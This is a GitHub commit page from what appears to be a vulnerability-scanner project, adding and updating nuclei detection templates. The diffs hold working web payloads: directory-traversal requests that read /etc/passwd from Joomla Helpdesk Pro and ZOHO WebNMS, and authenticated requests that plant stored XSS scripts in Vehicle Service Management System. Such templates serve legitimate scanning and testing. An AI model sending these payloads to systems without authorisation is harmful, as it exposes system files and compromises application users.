Skip to content

Commit fc31b51

Browse files
committed
up PoCs, nuclei to 2.7.7 2022-09-02
1 parent f8382bb commit fc31b51

File tree

84 files changed

+1540
-396
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

84 files changed

+1540
-396
lines changed

.github/up.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ go vet
2525
#cat ./pkg/fingerprint/dicts/eHoleFinger.json|jq ".fingerprint[].cms"|wc -l
2626
#cat ./pkg/fingerprint/dicts/localFinger.json|jq ".fingerprint[].cms"|wc -l
2727
#cat ./pkg/fingerprint/dicts/fg.json|jq ".[].kind"|wc -l
28-
git add config/nuclei-templates pocs_yml/ymlFiles
28+
git add config/nuclei-templates pocs_yml/ymlFiles vendor
2929
git add vendor
3030
git status
3131
go build

config/config.json

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -66,7 +66,7 @@
6666
"KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
6767
"naabu_dns": {},
6868
"naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
69-
"priorityNmap": true,
69+
"priorityNmap": false,
7070
"noScan": false,
7171
"enableMultNuclei": false,
7272
"enableNuclei": true,
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
id: CVE-2015-4074
2+
info:
3+
name: Joomla Helpdesk Pro plugin before 1.4.0 - Local File Disclosure
4+
author: 0x_Akoko
5+
severity: high
6+
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
7+
reference:
8+
- https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
9+
- https://www.exploit-db.com/exploits/37666/
10+
- https://www.cvedetails.com/cve/CVE-2015-4074
11+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
12+
classification:
13+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14+
cvss-score: 7.5
15+
cve-id: CVE-2015-4074
16+
cwe-id: CWE-22
17+
tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
18+
19+
requests:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
23+
24+
matchers-condition: and
25+
matchers:
26+
27+
- type: regex
28+
regex:
29+
- "root:[x*]:0:0"
30+
31+
- type: status
32+
status:
33+
- 200
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
id: CVE-2016-6601
2+
3+
info:
4+
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
5+
author: 0x_Akoko
6+
severity: high
7+
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
8+
reference:
9+
- https://www.cvedetails.com/cve/CVE-2016-6601
10+
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
11+
- https://www.exploit-db.com/exploits/40229/
12+
classification:
13+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14+
cvss-score: 7.5
15+
cve-id: CVE-2016-6601
16+
cwe-id: CWE-22
17+
tags: cve,cve2016,zoho,lfi,webnms
18+
19+
requests:
20+
- method: GET
21+
path:
22+
- "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"
23+
24+
matchers-condition: and
25+
matchers:
26+
- type: regex
27+
regex:
28+
- "root:.*:0:0"
29+
30+
- type: status
31+
status:
32+
- 200

config/nuclei-templates/cves/2021/CVE-2021-46068.yaml

Lines changed: 22 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -1,40 +1,42 @@
11
id: CVE-2021-46068
22

3-
info:
4-
name: Vehicle Service Management System - Stored Cross Site Scripting
5-
author: TenBird
6-
severity: medium
7-
description: |
8-
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
9-
reference:
10-
- https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
11-
- https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
12-
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13-
- https://nvd.nist.gov/vuln/detail/CVE-2021-46068
14-
classification:
15-
cve-id: CVE-2021-46068
16-
metadata:
17-
verified: true
18-
tags: cve,cve2021,xss,vms,authenticated
19-
3+
info:
4+
name: Vehicle Service Management System - Stored Cross Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
9+
reference:
10+
- https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
11+
- https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
12+
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2021-46068
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 4.8
17+
cve-id: CVE-2021-46068
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,xss,vms,authenticated
2022
requests:
2123
- raw:
2224
- |
23-
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
25+
POST /classes/Login.php?f=login HTTP/1.1
2426
Host: {{Hostname}}
2527
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2628
2729
username={{username}}&password={{password}}
2830
2931
- |
30-
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
32+
POST /classes/Users.php?f=save HTTP/1.1
3133
Host: {{Hostname}}
3234
Content-Type: application/x-www-form-urlencoded
3335
3436
id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
3537
3638
- |
37-
GET /vehicle_service/admin/?page=user HTTP/1.1
39+
GET /admin/?page=user HTTP/1.1
3840
Host: {{Hostname}}
3941
4042
req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46069.yaml

Lines changed: 22 additions & 22 deletions
Original file line numberDiff line numberDiff line change
@@ -1,42 +1,42 @@
11
id: CVE-2021-46069
22

3-
info:
4-
name: Vehicle Service Management System - Stored Cross Site Scripting
5-
author: TenBird
6-
severity: medium
7-
description: |
8-
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
9-
reference:
10-
- https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
11-
- https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
12-
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13-
- https://nvd.nist.gov/vuln/detail/CVE-2021-46069
14-
classification:
15-
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16-
cvss-score: 4.8
17-
cve-id: CVE-2021-46069
18-
cwe-id: CWE-79
19-
metadata:
20-
verified: "true"
21-
tags: cve,cve2021,xss,vms,authenticated
3+
info:
4+
name: Vehicle Service Management System - Stored Cross Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
9+
reference:
10+
- https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
11+
- https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
12+
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2021-46069
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 4.8
17+
cve-id: CVE-2021-46069
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,xss,vms,authenticated
2222
requests:
2323
- raw:
2424
- |
25-
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
25+
POST /classes/Login.php?f=login HTTP/1.1
2626
Host: {{Hostname}}
2727
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2828
2929
username={{username}}&password={{password}}
3030
3131
- |
32-
POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
32+
POST /classes/Master.php?f=save_mechanic HTTP/1.1
3333
Host: {{Hostname}}
3434
Content-Type: application/x-www-form-urlencoded
3535
3636
id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
3737
3838
- |
39-
GET /vehicle_service/admin/?page=mechanics HTTP/1.1
39+
GET /admin/?page=mechanics HTTP/1.1
4040
Host: {{Hostname}}
4141
4242
req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46071.yaml

Lines changed: 22 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -1,40 +1,42 @@
11
id: CVE-2021-46071
22

3-
info:
4-
name: Vehicle Service Management System - Stored Cross Site Scripting
5-
author: TenBird
6-
severity: medium
7-
description: |
8-
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
9-
reference:
10-
- https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
11-
- https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
12-
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13-
- https://nvd.nist.gov/vuln/detail/CVE-2021-46071
14-
classification:
15-
cve-id: CVE-2021-46071
16-
metadata:
17-
verified: true
18-
tags: cve,cve2021,xss,vms,authenticated
19-
3+
info:
4+
name: Vehicle Service Management System - Stored Cross Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
9+
reference:
10+
- https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
11+
- https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
12+
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2021-46071
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 4.8
17+
cve-id: CVE-2021-46071
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,xss,vms,authenticated
2022
requests:
2123
- raw:
2224
- |
23-
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
25+
POST /classes/Login.php?f=login HTTP/1.1
2426
Host: {{Hostname}}
2527
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2628
2729
username={{username}}&password={{password}}
2830
2931
- |
30-
POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
32+
POST /classes/Master.php?f=save_category HTTP/1.1
3133
Host: {{Hostname}}
3234
Content-Type: application/x-www-form-urlencoded
3335
3436
id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
3537
3638
- |
37-
GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
39+
GET /admin/?page=maintenance/category HTTP/1.1
3840
Host: {{Hostname}}
3941
4042
req-condition: true

config/nuclei-templates/cves/2021/CVE-2021-46072.yaml

Lines changed: 22 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -1,40 +1,42 @@
11
id: CVE-2021-46072
22

3-
info:
4-
name: Vehicle Service Management System - Stored Cross Site Scripting
5-
author: TenBird
6-
severity: medium
7-
description: |
8-
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
9-
reference:
10-
- https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
11-
- https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
12-
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13-
- https://nvd.nist.gov/vuln/detail/CVE-2021-46072
14-
classification:
15-
cve-id: CVE-2021-46072
16-
metadata:
17-
verified: true
18-
tags: cve,cve2021,xss,vms,authenticated
19-
3+
info:
4+
name: Vehicle Service Management System - Stored Cross Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
9+
reference:
10+
- https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
11+
- https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
12+
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2021-46072
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 4.8
17+
cve-id: CVE-2021-46072
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,xss,vms,authenticated
2022
requests:
2123
- raw:
2224
- |
23-
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
25+
POST /classes/Login.php?f=login HTTP/1.1
2426
Host: {{Hostname}}
2527
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2628
2729
username={{username}}&password={{password}}
2830
2931
- |
30-
POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
32+
POST /classes/Master.php?f=save_service HTTP/1.1
3133
Host: {{Hostname}}
3234
Content-Type: application/x-www-form-urlencoded
3335
3436
id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
3537
3638
- |
37-
GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
39+
GET /admin/?page=maintenance/services HTTP/1.1
3840
Host: {{Hostname}}
3941
4042
req-condition: true
Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
id: CVE-2021-46073
2+
3+
info:
4+
name: Vehicle Service Management System - Cross Site Scripting
5+
author: TenBird
6+
severity: medium
7+
description: |
8+
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.
9+
reference:
10+
- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
11+
- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
12+
- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
13+
- https://nvd.nist.gov/vuln/detail/CVE-2021-46073
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
16+
cvss-score: 4.8
17+
cve-id: CVE-2021-46073
18+
cwe-id: CWE-79
19+
metadata:
20+
verified: "true"
21+
tags: cve,cve2021,xss,vms,authenticated
22+
requests:
23+
- raw:
24+
- |
25+
POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
26+
Host: {{Hostname}}
27+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
28+
29+
username={{username}}&password={{password}}
30+
31+
- |
32+
POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
33+
Host: {{Hostname}}
34+
Content-Type: application/x-www-form-urlencoded
35+
36+
firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
37+
38+
- |
39+
GET /vehicle_service/admin/?page=user/list HTTP/1.1
40+
Host: {{Hostname}}
41+
42+
req-condition: true
43+
redirects: true
44+
max-redirects: 2
45+
cookie-reuse: true
46+
matchers-condition: and
47+
matchers:
48+
- type: dsl
49+
dsl:
50+
- "contains(all_headers_3, 'text/html')"
51+
- "status_code_3 == 200"
52+
- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
53+
condition: and

0 commit comments

Comments
 (0)